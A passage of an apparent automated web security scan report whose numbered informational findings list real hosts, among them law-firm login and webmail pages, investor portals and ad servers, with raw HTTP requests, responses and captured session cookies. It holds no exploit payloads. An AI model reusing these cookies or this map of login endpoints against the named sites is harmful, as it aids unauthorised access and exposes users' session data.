User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

newPassword=False&userid=&password=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 150
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:02 GMT
Cache-control: private

<script type="text/javascript">
parent.MainPnl.userFocus();
parent.MainPnl.sendMessage('Login Failed', 'Invalid User ID or Password.');
</script>

27.12. https://ams-legal.net/tuckerellis/blank.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/blank.htm

Request

Response

27.13. https://ams-legal.net/tuckerellis/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/default.asp

Request

Response

27.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

Response

27.15. http://dealbook.nytimes.com/svc/timespeople/bell.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/svc/timespeople/bell.html

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&method=get&params=&bell=http://dealbook.nytimes.com/svc/timespeople/bell.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:12 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

27.16. https://investor.kkr.com/investor/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/investor/login.html

Request

Response

27.17. http://js.adsonar.com/js/pass.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.adsonar.com
Path:	/js/pass.html

Request

GET /js/pass.html?cb=30305 HTTP/1.1
Host: js.adsonar.com
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 23 Nov 2010 14:44:54 GMT
ETag: "5ab-495b96a6f2580"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html
Cache-Control: max-age=1677
Expires: Thu, 12 May 2011 12:07:17 GMT
Date: Thu, 12 May 2011 11:39:20 GMT
Connection: close
Content-Length: 1451

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...

27.18. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://markets.on.nytimes.com
Path:	/research/modules/dealbook_2010/dealbook.asp

Request

Response

27.19. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Request

Response

27.20. http://ping.chartbeat.net/ping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.chartbeat.net
Path:	/ping

Request

GET /ping?h=bloomberg.com&p=%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&u=05vt53emlalrxzsu&d=bloomberg.com&g=15087&n=0&c=2.5&x=0&y=3619&w=964&j=150&R=0&W=0&I=1&b=29189&t=vamaxzkbswvn70xh&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Referrer data required.
Server: nginx/0.7.67
Date: Thu, 12 May 2011 11:40:10 GMT
Content-Type: text/html
Connection: close
Content-Length: 146

<HTML><HEAD>
<TITLE>500 Referrer data required.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

27.21. https://services.sungarddx.com/admin/GetExternMedia.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/admin/GetExternMedia.aspx

Request

Response

27.22. https://services.sungarddx.com/common/js/AdminFunctions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/common/js/AdminFunctions.asp

Request

Response

27.23. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/3/foxbusiness/300x250/ros

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

27.24. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://timespeople.nytimes.com
Path:	/packages/html/timespeople/xmlhttprequest.html

Request

GET /packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&method=get&params=&bell=http://dealbook.nytimes.com/svc/timespeople/bell.html HTTP/1.1
Host: timespeople.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:16 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 385

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title></title>
<script src="http://graphics8.nytimes.com/js/app/lib/json/json2-min.js" type="text/javascript" charset="utf-8
...[SNIP]...

27.25. http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

Request

GET /adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00 HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:16:09 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;

27.26. http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

Request

GET /adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; _chartbeat2=0b2fi2bgk284tw0q; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200307534:ss=1305198204263; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:2; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=FD213EE6971B98D7B9BD717BA7F666F0&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.18.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:38:31 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;

27.27. http://topics.nytimes.com/svc/timespeople/bell.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/svc/timespeople/bell.html

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&method=get&params=&bell=http://topics.nytimes.com/svc/timespeople/bell.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:16:10 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

27.28. http://wd.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

stButtons.processCB({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl"
...[SNIP]...

27.29. https://webmail-us.mimecast.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://webmail-us.mimecast.com
Path:	/

Request

Response

27.30. https://webmail-us.mimecast.com/webMail/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://webmail-us.mimecast.com
Path:	/webMail/login.jsp

Request

Response

27.31. http://webmail.tuckerellis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.tuckerellis.com
Path:	/

Request

GET / HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Content-Length: 98
Content-Type: text/html
Content-Location: http://webmail.tuckerellis.com/index.html
Last-Modified: Sat, 31 Jan 2004 01:56:03 GMT
Accept-Ranges: bytes
ETag: "e74913629de7c31:2a7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:27 GMT

<html>
<body onload="window.location='https://webmail.tuckerellis.com/exchange'"></body>
</html>

27.32. http://www.apolloic.com/public/home.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apolloic.com
Path:	/public/home.asp

Request

GET /public/home.asp HTTP/1.1
Host: www.apolloic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDBARRT=FEIJJBNBENDIJBGBGDNPLAMF

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 11:40:55 GMT
Content-Length: 5797
Content-Type: text/html
Expires: Thu, 12 May 2011 11:39:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<html>

<head>
<title>Apollo Investment Corporation</title>
<meta name="description" content="Apollo Investment Corporation (NASDAQ: AINV), managed by Apollo Investment Management, provide
...[SNIP]...

27.33. http://www.carlyle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carlyle.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186619067.604400709.1305200382.1305200382.1305200382.1; __utmb=186619067; __utmc=186619067; __utmz=186619067.1305200382.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 1815
Content-Type: text/html
Content-Location: http://www.carlyle.com/PageNotFound.html?404;http://www.carlyle.com:80/favicon.ico
Last-Modified: Thu, 05 May 2011 19:07:25 GMT
Accept-Ranges: bytes
ETag: "a69f53ab57bcc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:09 GMT

<html>
<head>
<title>The Carlyle Group : Page Not Found</title>
   <style type="text/css">
       #errorBox {
           width:400px;
           padding:12px;
           font-family: Arial, Helvetica, sans-serif;
           text-
...[SNIP]...

27.34. http://www.conferenceservers.com/browser/proxy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conferenceservers.com
Path:	/browser/proxy.asp

Request

Response

27.35. http://www.managedfuturespecialist.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.managedfuturespecialist.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.managedfuturespecialist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:06:07 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Accept-Ranges: bytes
Age: 0
Content-Length: 1252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

27.36. http://www.milbank.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milbank.com
Path:	/

Request

GET / HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Milbank+Tweed+Hadley+%26+McCloy&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Content-Length: 160
Content-Type: text/html
Content-Location: http://www.milbank.com/Default.htm
Last-Modified: Tue, 15 May 2007 20:16:15 GMT
Accept-Ranges: bytes
ETag: "d1b1fe42d97c71:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:31 GMT

<html>
<head>
<title>Milbank, Tweed, Hadley & McCloy LLP</title>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.milbank.com/en">
</head>
</html>

27.37. http://www.milbank.com/clientweb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milbank.com
Path:	/clientweb/

Request

GET /clientweb/ HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
